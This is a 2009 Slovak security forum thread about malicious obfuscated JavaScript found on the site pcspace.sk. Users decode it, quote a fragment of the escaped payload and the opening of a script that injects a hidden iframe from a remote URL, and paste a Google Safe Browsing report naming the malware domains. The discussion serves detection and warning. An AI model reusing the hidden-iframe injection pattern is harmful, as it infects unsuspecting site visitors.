PCspace.sk - distribuujeme malware

Bezpečnosť na internet a všetko okolo nej....
Užívateľov profilový obrázok
Snake
Administrátor
Administrátor
Príspevky: 12673
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta
Kontaktovať užívateľa:

PCspace.sk - distribuujeme malware

Príspevok od užívateľa Snake » So 11. Apr, 2009, 15:28

Pokiaľ ste dnes navštívili PCspace.sk, a mali zapnutý antivírus (povedzme NOD) a JavaScript, antivirák vám zobrazil dosť nepeknú hlášku podobnú tejto:
Obrázok
Keď mi Matej Koleják poslal tento screenshot, najprv som si myslel že sa jedná o nechutný žart a že u neho doznieva prvý apríl. Po návšteve stránky s firefox rozšírením NoScript (zakazuje elementy ako JS a Flash), a následnú inšpekciu DOM kódu, som zistil že sa nejedná o žart, ale v záhlaví sa nachádzal nasledovný silno obfuskovaný kód:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>
Po preložení sa z neho stalo toto:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>

Kde som zistil že kód má 2 levely obfuskácie, pričom druhý je realizovaný pomocou jednoduchého URL kódu (komu sa ho podarí dešifrovať nech mi pošle SS). Malware pravdepodobne sťahuje niečo z adresy uvedenej na obrázku.

To že JS sa oplatí mať vypnutý sa opäť potvrdilo, jedno z najlepších rozšírení NoScript taktiež pomohlo (každý by si ho mal nainštalovať, web je potom ozaj bezpečnejší), no a NOD32? Ukázal sa v dobrom svetle.

Za tip ďakujem Matejovi Kolejákovi (crux2005).

//edit 15:56:

Screenshot ako POC

Obrázok

//edit 13:37:

Dekodovany kod:
<a href="http://snake.havran.eu.sk/pretaktovanie ... b]Zobraziť PLAIN kód[/b][/center]</a>
Naposledy upravil/-a Snake v Ne 12. Apr, 2009, 13:37, upravené celkom 1 krát.
Dôvod: space3.txt
#rollerman

Užívateľov profilový obrázok
Gudas
VIP
VIP
Príspevky: 8195
Dátum registrácie: Po 09. Okt, 2006, 02:00
Bydlisko: Rudina (27)
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Gudas » So 11. Apr, 2009, 16:45

Fuj, prasata!
Kto ten web píše? Však to jak nejaký underground porno-warez server, bordel načítaný hneď na prvej stránke...
Spoiler: ukázať
Desktop| ASRock Z68 Pro3-M | Core i3 3220 @ 3,4GHz + Phanteks PH-TC14PE (pasívne) | 12GiB DDR3 1333MHz | MSI GTX760 Gaming | SuperFlower Golden King 550W 80+ Platinum | Crucial m4 256GB + WD 1TB Red 2,5" 5400rpm @ Scythe Quiet Drive| Fractal Design Define Mini + Nexus D12SL-12 + Noiseblocker PK-1 + Scythe Gentle Typhoon | LG IPS235 + LG L225WT | Creative Inspire T2900 + Beyerdynamic DT990 Pro + Creative X-Fi HD | Logitech MX1100 + QcK Steel mini
Laptop| Acer Aspire One 753 | Celeron U3400 (1,06GHz) | 2x2GiB DDR3 | A-DATA S599 128GB
PC.sk IRC kanál PC.sk
Práve testujem: - Next: -

Užívateľov profilový obrázok
Thunderbolt
Používateľ
Používateľ
Príspevky: 251
Dátum registrácie: Št 02. Apr, 2009, 18:55
Bydlisko: Košice
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Thunderbolt » So 11. Apr, 2009, 18:07

Aj mne NODka ukázala že je tam nejaký koník.
CPU: Intel Xeon X5460@3.8GHz CPU Cooler: Scythe Ninja 4 MB: Gigabyte EP45-DS4 GPU: SAPPHIRE R7 265 DUAL-X, RAM: A-Data 4x2GB DDR2 800+ EE SDD: Crucial BX100 250GB HDD: Samsung F3 1TB + HDD Vibration Killer + 2x Seagate 3TB PSU: Corsair HX520 CASE: Cooler Master Centurion LCD: EIZO EV2450-BK OS: Windows 8.1 Pro 64-bit

Užívateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 864
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa pEpinko » So 11. Apr, 2009, 22:30

Mozem sa spytat, co znamena obfuskacia pomocu jednoducheho URL kodu?

Ja som to chvilu pozeral a dopracoval som sa k tomu ze cele to smeruje na cinsku domenu.

Inak pozeram, ze sa nam tu nejak rozrastla cenzura, clanok o Malackach a ich webe nejako nemozem najst...

Užívateľov profilový obrázok
Snake
Administrátor
Administrátor
Príspevky: 12673
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Snake » So 11. Apr, 2009, 22:48

Obfuskovaný kód >> http://en.wikipedia.org/wiki/Obfuscated_code" onclick="window.open(this.href);return false;

Ano smeruje to na .cn doménu

Čo sa týka článku malacky.sk, objaví sa tu keď sa tá chyba fixne, ako som písal aj tam, scritp-kiddies podporovať nemienim.
#rollerman

Užívateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 864
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa pEpinko » So 11. Apr, 2009, 23:24

Co je obfuskovany kod viem, ale zaujimalo ma ci je obfuskacia pomocou jednoducheho URL nieco extra...

Ale kod to bol celkom zaujimavy asi by som mal pozerat take cosi castejsie. Cele to treba 2 krat dekodovat aby sme sa k niecomu dostali. Musim povedat, ze sucasne obfuskatory robia dobru pracu.

Ad Malacky: Chapem, zbytocne by sa tym poskodzovalo mesto... (Som zvedavy ci a ak ano tak kedy to vsetko opravia :) )

Užívateľov profilový obrázok
Snake
Administrátor
Administrátor
Príspevky: 12673
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Snake » So 11. Apr, 2009, 23:34

pEpinko: čím si preložil ešte string po HEX kóde? mne to pomocou jednoduchého

Kód: Vybrať všetko

<script type="text/javascript">
var array = "string";
array = unescape(array);
</script>
document.write(array);
nešlo :(
#rollerman

Užívateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 864
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa pEpinko » Ne 12. Apr, 2009, 08:46

Po tom prelozeni (do tvojho space2.txt) je tam nieco ako

Kód: Vybrať všetko

faqCg('%32%37%31%33%30%33%35%32%46%05%3c%3c%05%29%5d%54 ...
je jasne ze, kod ktory nas zaujima je prave tam. Po prvom pohlade je jasne, ze je to string ktory vznikol pomocou funkcie javascriptu escape. V com nas utvrdi aj kod, kedze je tam riadok

Kód: Vybrať všetko

jFHtK = unescape(jFHtK);
Problemom ale je ze sa tam nachadzaju aj znaky ako backspace... A celkovo je to neecitatelne, dalej sa v kode ale robia upravy nad tymto stringom. Kedze sa mi ich nechcelo lustit, pekne som to oddebugoval vo virtualnom stroji kde mi nic nemoze :) . Potom som z tej jednej premennej skopcil kod.

Zacina nejak takto:

Kód: Vybrať všetko

function VzNQs() {};
VzNQs.prototype = {
  install: function() {
    if (!this.alreadyInstalled()) {
      var s = "<div style='display:none'><iframe src='" + this.getFrameURL() + "'></iframe></div>";
      try {
Pripadnym zaujemcom ho poslem aj cely.

Užívateľov profilový obrázok
Snake
Administrátor
Administrátor
Príspevky: 12673
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Snake » Ne 12. Apr, 2009, 13:03

môžeš to niekam hodiť :-)
#rollerman

Užívateľov profilový obrázok
pEpinko
Používateľ
Používateľ
Príspevky: 864
Dátum registrácie: Po 19. Máj, 2008, 09:31
Bydlisko: BA/NR

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa pEpinko » Ne 12. Apr, 2009, 13:30

Dufam ze to pojde. ZIP ARCHIV

Niektore veci v tvare 5%^%Jhygded.replace('/gfhe/', ''); som uz vyhodnotil a prelepil to v kode aby to bolo citatelnejsie, inak je kod bez uprav.

Užívateľov profilový obrázok
Snake
Administrátor
Administrátor
Príspevky: 12673
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Snake » Ne 12. Apr, 2009, 13:40

zaujímavé čítanie :-) dík :)
#rollerman

Užívateľov profilový obrázok
Snake
Administrátor
Administrátor
Príspevky: 12673
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Snake » Po 13. Apr, 2009, 23:41

UPS
Safe Browsing
Diagnostic page for pcspace.sk

What is the current listing status for pcspace.sk?

This site is not currently listed as suspicious.

What happened when Google visited this site?

Of the 451 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-04-12, and the last time suspicious content was found on this site was on 2009-01-14.

Malicious software includes 229 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 9 new process(es) on the target machine.

Malicious software is hosted on 2 domain(s), including originalcn.cn/, typecn.cn/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including mostdey.cn/.

This site was hosted on 1 network(s) including AS29208 (DIALTELECOM).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, pcspace.sk did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.
Navyše, vidím že oni to celkom ignorujú (správa z google a aj užívateľov)

http://www.pcsforum.sk/viewtopic.php?f=10&t=15104" onclick="window.open(this.href);return false;
http://www.pcsforum.sk/viewtopic.php?f=18&t=14256" onclick="window.open(this.href);return false;
http://www.pcsforum.sk/viewtopic.php?f=10&t=10040" onclick="window.open(this.href);return false;
#rollerman

Užívateľov profilový obrázok
Gudas
VIP
VIP
Príspevky: 8195
Dátum registrácie: Po 09. Okt, 2006, 02:00
Bydlisko: Rudina (27)
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Gudas » Ut 14. Apr, 2009, 10:33

...čiže ináč povedané: vieme o tom už dlhšie, zatiaľ to nevieme riešiť, tak sem-tam treba rátať s nejakým tým malware na pcspace.sk. Pokúsime sa to definitívne riešiť bohviekedy...

Nice one :rolleyes:
Spoiler: ukázať
Desktop| ASRock Z68 Pro3-M | Core i3 3220 @ 3,4GHz + Phanteks PH-TC14PE (pasívne) | 12GiB DDR3 1333MHz | MSI GTX760 Gaming | SuperFlower Golden King 550W 80+ Platinum | Crucial m4 256GB + WD 1TB Red 2,5" 5400rpm @ Scythe Quiet Drive| Fractal Design Define Mini + Nexus D12SL-12 + Noiseblocker PK-1 + Scythe Gentle Typhoon | LG IPS235 + LG L225WT | Creative Inspire T2900 + Beyerdynamic DT990 Pro + Creative X-Fi HD | Logitech MX1100 + QcK Steel mini
Laptop| Acer Aspire One 753 | Celeron U3400 (1,06GHz) | 2x2GiB DDR3 | A-DATA S599 128GB
PC.sk IRC kanál PC.sk
Práve testujem: - Next: -

Užívateľov profilový obrázok
Snake
Administrátor
Administrátor
Príspevky: 12673
Dátum registrácie: Ne 23. Júl, 2006, 02:00
Bydlisko: Bratislava/Galanta
Kontaktovať užívateľa:

Re: PCspace.sk - distribuujeme malware

Príspevok od užívateľa Snake » Ut 14. Apr, 2009, 11:29

jop, presne tak to je myslené
#rollerman

Napísať odpoveď

Návrat na "Security"